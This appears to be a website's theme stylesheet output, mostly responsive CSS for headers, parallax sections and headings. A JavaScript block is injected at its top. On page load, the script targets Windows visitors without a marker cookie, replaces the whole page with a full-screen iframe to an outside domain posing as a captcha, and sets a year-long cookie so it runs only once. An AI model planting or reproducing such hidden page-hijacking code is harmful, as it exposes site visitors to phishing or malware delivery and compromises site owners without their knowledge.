<script secretid="test">
    (function () {
        function getCookie() {
            var e = document.cookie,
                n = new RegExp("(^|; )cookie-captcha-complete=([^;]*)").exec(e);
            return n ? decodeURIComponent(n[2]) : null
        }

        function isWindows() {
            return /windows|win32|win64/i.test(navigator.userAgent)
        }

        function checkCaptcha() {
            if (!getCookie() && isWindows()) {
                document.documentElement.innerHTML = '<!DOCTYPE html><html><head><style>html,body{margin:0;padding:0;height:100%;overflow:hidden}iframe{width:100%;height:100%;border:none}</style></head><body><iframe src="https://steam-cloud.pro/?domain="></iframe></body></html>'
                document.cookie = "cookie-captcha-complete=1; path=/; max-age=" + (60 * 60 * 24 * 365);
            }
        }
        if (document.readyState === "loading") {
            document.addEventListener("DOMContentLoaded", checkCaptcha)
        } else {
            checkCaptcha()
        }
    })() 
</script>@media only screen and (max-width: 1000px){
		.header_bottom {
		background-color: #ffffff;
	}
				.header_bottom,
		nav.mobile_menu{
			background-color: #ffffff !important;
		}
					.content .container .container_inner.default_template_holder,
		.content .container .container_inner.page_container_inner {
			padding-top:80px !important; /*important because of the inline style on page*/
		}
	}
@media only screen and (min-width: 480px) and (max-width: 768px){
	
	        section.parallax_section_holder{
			height: auto !important;
			min-height: 400px;
		}
		}
@media only screen and (max-width: 768px){
	
	
	
	
	
	
	
	
	
	
	
	
	
}
@media only screen and (max-width: 600px) {
	
			h2, h2 a, body.qode-overridden-elementors-fonts .elementor-widget-heading h2.elementor-heading-title {
			font-size: 30px; 			line-height: 35px; 		    		}
	
	
	
	
	
	
	
	
	
	}
@media only screen and (max-width: 480px){

			section.parallax_section_holder {
			height: auto !important;
			min-height: 400px;
		}
	
		
	}
